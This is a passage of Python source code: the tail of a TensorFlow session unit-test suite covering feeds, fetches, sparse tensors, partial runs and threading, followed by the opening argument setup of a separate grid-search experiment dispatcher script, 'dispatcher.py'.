with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray(10.0, dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
array_ops.placeholder(dtype=np.int64,
shape=(3,)),)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: (values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run(
[ind_values, ind_indices], {ind: (values, indices)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run(
[ind_values, ind_indices],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'The Session graph is empty.' in str(e)):
sess.run([])
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session():
for dtype in [dtypes.float32,
dtypes.float64,
dtypes.int32,
dtypes.uint8,
dtypes.int16,
dtypes.int8,
dtypes.int64,
dtypes.bool,
dtypes.complex64]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
out_t.eval(feed_dict={feed_t: np_array}))
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(c.eval(feed_dict={feed_t: c_list}), c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
RuntimeError,
'No session factory registered for the given session options.'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 17
res = sess.partial_run(h, r2, feed_dict={c: temp})
self.assertEqual(153, res)
# Call again on the same graph.
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 18
res = sess.partial_run(h2, r2, feed_dict={c: temp})
self.assertEqual(162, res)
def testPartialRunIncomplete(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
def testConcurrentPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h1 = sess.partial_run_setup([r1], [a, b, c])
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 19
res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9})
self.assertEqual(66, res)
res = sess.partial_run(h2, r2, feed_dict={c: 7})
self.assertEqual(462, res)
def testManyPartialRun(self):
with session.Session() as sess:
steps = 200
inputs = []
outputs = []
a = constant_op.constant(2.0, dtypes.float32)
for i in xrange(steps):
inputs.append(array_ops.placeholder(dtypes.float32, shape=[]))
a = math_ops.mul(a, inputs[i])
outputs.append(a)
h = sess.partial_run_setup(outputs, inputs)
for i in xrange(steps):
res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0})
self.assertEqual(2.0, res)
feed_dict = {}
for i in xrange(steps):
feed_dict[inputs[i]] = 1.0
res = sess.run(outputs, feed_dict)
self.assertEqual(steps, len(res))
self.assertEqual(2.0, res[-1])
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, "Cannot interpret feed_dict"):
sess.run(a, feed_dict={'a': [2.0]})
if __name__ == '__main__':
googletest.main()
|
dispatcher.py | import argparse
import subprocess
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = "3"
import multiprocessing
import pickle
import csv
import json
import sys
from os.path import dirname, realpath
import random
from collections import OrderedDict
import copy
sys.path.append(dirname(dirname(realpath(__file__))))
from sandstone.utils import parsing
from sandstone.utils.generic import md5
EXPERIMENT_CRASH_MSG = "ALERT! job:[{}] has crashed! Check logfile at:[{}]"
CONFIG_NOT_FOUND_MSG = "ALERT! {} config {} file does not exist!"
RESULTS_PATH_APPEAR_ERR = 'results_path should not appear in config. It will be determined automatically per job'
SUCESSFUL_SEARCH_STR = "SUCCESS! Grid search results dumped to {}"
LOG_KEYS = ['results_path', 'model_path', 'log_path']
parser = argparse.ArgumentParser(description='Grid Search Dispatcher. ')
parser.add_argument("config_path", type=str, nargs='+', help="Path of experiment config(s)")
parser.add_argument('--log_dir', type=str, default="logs", help="path to store logs and detailed job level result files")
parser.add_argument('--result_path', type=str, default="results/grid_search.csv", help="path to store grid_search table. This is preferably on shared storage")
parser.add_argument('--sort_key', type=str, default="dev_loss", help="How to sort csv")
parser.add_argument('--rerun', action='store_true', default=False, help='whether to rerun experiments with the same result file location')
parser.add_argument('--shuffle', action='store_true', default=False, help='whether to shuffle order of experiments')
parser.add_argument('--dry_run', action='store_true', default=False, help='whether to not actually run the jobs')
parser.add_argument('--gpus', type=str, nargs='+', default=None, help="GPUs to use. Overrides available_gpus.")
